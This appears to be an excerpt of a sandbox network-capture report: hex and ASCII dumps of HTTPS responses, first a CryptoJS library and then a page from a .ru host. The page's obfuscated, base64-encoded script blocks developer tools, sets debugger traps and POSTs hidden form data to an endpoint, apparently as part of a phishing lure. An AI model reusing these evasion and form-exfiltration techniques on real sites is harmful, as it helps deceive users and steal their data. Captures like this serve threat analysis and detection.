                                                                                  2025-01-07 18:49:00 UTC1369INData Raw: 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f
                                                                                  Data Ascii: ==i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?
                                                                                  2025-01-07 18:49:00 UTC1369INData Raw: 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29
                                                                                  Data Ascii: e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)
                                                                                  2025-01-07 18:49:00 UTC1369INData Raw: 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37
                                                                                  Data Ascii: o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967
                                                                                  2025-01-07 18:49:00 UTC1369INData Raw: 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c
                                                                                  Data Ascii: (S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),
                                                                                  2025-01-07 18:49:00 UTC1369INData Raw: 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c
                                                                                  Data Ascii: ne.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<
                                                                                  2025-01-07 18:49:00 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29
                                                                                  Data Ascii: unction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.649724104.21.112.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:01 UTC655OUTGET /xaxb/ HTTP/1.1
                                                                                  Host: 7x8x.digitalvoyage.ru
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-Dest: document
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:01 UTC1240INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:01 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, private
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJIUISddPFCpXY7%2FnWWhmKX3wXz4jAfQWVvZUbYG3sV17WMqlLV%2BncMnXck5WE1TTax2aIXyrqRPrOXWvrc1AWPNR5IRDC9M7621OIwgKvQNnWkV3t9crPsgbLg85w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1382&min_rtt=1328&rtt_var=468&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1565&delivery_rate=1834072&cwnd=251&unsent_bytes=0&cid=6bc11958a6569d49&ts=101&x=0"
                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IjloMEpHdU9aNTVxeWh2N01sNnh2Vnc9PSIsInZhbHVlIjoicU1NRnBHc3VhcUdNMkRET055RTlxSGMycDBKQjgwYkFTWXk5eEk4RSt4WENwaFV4L2loejFxUTJ1MWRCMERmRmR1VUFKcHlScEh4WVQ5SisxRHFzdnBqU0VtaHYyR0NYK0drMWEvSVJmamNINUJoRlhDM0xmTG5sZi9RYkdlbWMiLCJtYWMiOiJhN2M2YzQ1NDQxNzA4YjM1N2VkNzk1ZTc2ZGFjMWFlYTc0MzcwZjU1ZWQ0ODI2NDIyN2M0MTgwNDJjMjA2OGExIiwidGFnIjoiIn0%3D; expires=Tue, 07-Jan-2025 20:49:01 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                  2025-01-07 18:49:01 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 56 6c 53 30 52 55 63 6e 68 77 5a 30 35 4f 61 32 52 4c 5a 56 4a 45 56 55 39 6b 53 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 30 52 33 54 58 56 30 4f 47 74 51 5a 6a 4a 4b 51 7a 6c 6e 53 47 78 70 4e 30 68 49 65 58 56 51 57 48 52 44 64 6b 52 51 5a 7a 49 7a 54 6b 6c 58 55 31 51 7a 57 45 59 77 5a 58 4a 51 4d 7a 6b 78 65 6c 70 61 59 55 70 59 52 6c 42 6e 52 54 41 72 52 31 46 6c 64 33 6c 36 4e 48 56 31 61 44 56 36 61 79 39 75 62 46 52 69 56 6c 56 51 64 32 70 4d 4d 56 46 49 52 47 31 55 55 54 42 4d 59 56 46 71 53 6d 64 32 53 58 56 6f 53 44 56 5a 52 30 78 34 5a 32 39 42 62 6e 4a 75 56 30 67 35 52 46 6c 59 56 56 63 34 61 6c 42 4e 59 55 38
                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImVlS0RUcnhwZ05Oa2RLZVJEVU9kS3c9PSIsInZhbHVlIjoiV0R3TXV0OGtQZjJKQzlnSGxpN0hIeXVQWHRDdkRQZzIzTklXU1QzWEYwZXJQMzkxelpaYUpYRlBnRTArR1Fld3l6NHV1aDV6ay9ubFRiVlVQd2pMMVFIRG1UUTBMYVFqSmd2SXVoSDVZR0x4Z29BbnJuV0g5RFlYVVc4alBNYU8
                                                                                  2025-01-07 18:49:01 UTC1369INData Raw: 34 64 62 39 0d 0a 3c 21 2d 2d 20 44 6f 6e 26 23 30 33 39 3b 74 20 77 61 74 63 68 20 74 68 65 20 63 6c 6f 63 6b 3b 20 64 6f 20 77 68 61 74 20 69 74 20 64 6f 65 73 2e 20 4b 65 65 70 20 67 6f 69 6e 67 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 41 6c 6c 20 6f 75 72 20 64 72 65 61 6d 73 20 63 61 6e 20 63 6f 6d 65 20 74 72 75 65 20 69 66 20 77 65 20 68 61 76 65 20 74 68 65 20 63 6f 75 72 61 67 65 20 74 6f 20 70 75 72 73 75 65 20 74 68 65 6d 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 54 68 65 20 77 61 79 20 74 6f 20 67 65 74 20 73 74 61 72 74 65 64 20 69 73 20 74 6f 20 71 75 69 74 20 74 61 6c 6b 69 6e 67 20 61 6e 64 20 62 65 67 69 6e 20 64 6f 69 6e 67 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 33 57 44 68 34 4c 6d 52
                                                                                  Data Ascii: 4db9... Don&#039;t watch the clock; do what it does. Keep going. -->... All our dreams can come true if we have the courage to pursue them. --><script>/* The way to get started is to quit talking and begin doing. */if(atob("aHR0cHM6Ly83WDh4LmR
                                                                                  2025-01-07 18:49:01 UTC1369INData Raw: 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 31 56 4a 65 6c 70 73 51 57 74 79 5a 55 34 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 56 55 6c 36 57 6d 78 42 61 33 4a 6c 54 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 31 56 4a 65 6c 70 73 51 57 74 79 5a 55 34 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 63 77 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48
                                                                                  Data Ascii: 3aWR0aDoxMjAwcHgpew0KI1VJelpsQWtyZU4gaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojVUl6WmxBa3JlTiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI1VJelpsQWtyZU4uY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTcwcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaH
                                                                                  2025-01-07 18:49:01 UTC1369INData Raw: 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52
                                                                                  Data Ascii: bmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3R
                                                                                  2025-01-07 18:49:01 UTC1369INData Raw: 55 39 47 49 44 30 67 4d 54 41 77 4f 77 30 4b 49 43 41 67 49 48 4e 6c 64 45 6c 75 64 47 56 79 64 6d 46 73 4b 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 57 5a 6b 5a 6c 56 30 68 49 53 6d 74 47 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 6f 55 33 56 44 53 46 52 53 54 47 46 45 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 6f 55 33 56 44 53 46 52 53 54 47 46 45 49 43 30 67 56 6d 5a 47 5a 56 64 49 53 45 70 72 52 69 41 2b
                                                                                  Data Ascii: U9GID0gMTAwOw0KICAgIHNldEludGVydmFsKGZ1bmN0aW9uKCkgew0KICAgICAgICBjb25zdCBWZkZlV0hISmtGID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCBoU3VDSFRSTGFEID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChoU3VDSFRSTGFEIC0gVmZGZVdISEprRiA+
                                                                                  2025-01-07 18:49:01 UTC1369INData Raw: 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 48 56 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 64 57 45 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6e 68 59 52 58 68 6c 55 31 4e 4b 61
                                                                                  Data Ascii: FsdWU9IiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZHVhIiBuYW1lPSJibHRkdWEiIHZhbHVlPSJVbmtub3duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkZGF0YSIgbmFtZT0iYmx0ZGRhdGEiIHZhbHVlPSIiPg0KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9InhYRXhlU1NKa
                                                                                  2025-01-07 18:49:01 UTC1369INData Raw: 30 5a 58 68 30 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 68 30 5a 58 68 30 49 44 30 39 49 44 41 70 65 77 30 4b 49 43 41 67 49 47 5a 6c 64 47 4e 6f 4b 48 4e 77 62 57 52 47 53 46 4e 75 64 46 59 73 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 62 57 56 30 61 47 39 6b 4f 69 41 69 55 45 39 54 56 43 49 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 34 57 46 4e 61 56 6e 64 49 63 31 4a 48 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57
                                                                                  Data Ascii: 0ZXh0ID0+IHsNCiAgICBpZih0ZXh0ID09IDApew0KICAgIGZldGNoKHNwbWRGSFNudFYsIHsNCiAgICAgICAgbWV0aG9kOiAiUE9TVCIsDQogICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YSh4WFNaVndIc1JHKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW
                                                                                  2025-01-07 18:49:01 UTC1369INData Raw: 48 6f 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 0d 0a 69 66 28 62 68 46 70 47 4e 53 50 53 6e 20 3d 3d 20 47 63 53 71 49 51 58 66 6a 45 29 7b 0d 0a 63 6f 6e 73 74 20 71 45 69 73 6f 4c 6a 41 4e 68 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 4b 55 47 41 45 49 50 48 48 6f 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 4b 55 47 41 45 49 50 48 48 6f 2e 70 61 74 68 6e 61 6d 65 20 3d 20 4b 55 47 41 45 49 50 48 48 6f 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a
                                                                                  Data Ascii: Ho.hostname.split('.').slice(-2).join('.');if(bhFpGNSPSn == GcSqIQXfjE){const qEisoLjANh = window.location.pathname.split('%23')[0].split('%3F')[0];if (KUGAEIPHHo.pathname.endsWith('/')) {KUGAEIPHHo.pathname = KUGAEIPHHo.pathname.slice(0, -1);
                                                                                  2025-01-07 18:49:01 UTC1369INData Raw: 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 31 56 4a 65 6c 70 73 51 57 74 79 5a 55 34 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 56 55 6c 36 57 6d 78 42 61 33 4a 6c 54 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 31 56 4a 65 6c 70 73 51 57 74 79 5a 55 34 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 63 77 63 48 67 37 4c 79 70 33 61 57 52
                                                                                  Data Ascii: bGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI1VJelpsQWtyZU4gaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojVUl6WmxBa3JlTiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI1VJelpsQWtyZU4uY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTcwcHg7Lyp3aWR
                                                                                  2025-01-07 18:49:01 UTC1369INData Raw: 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67
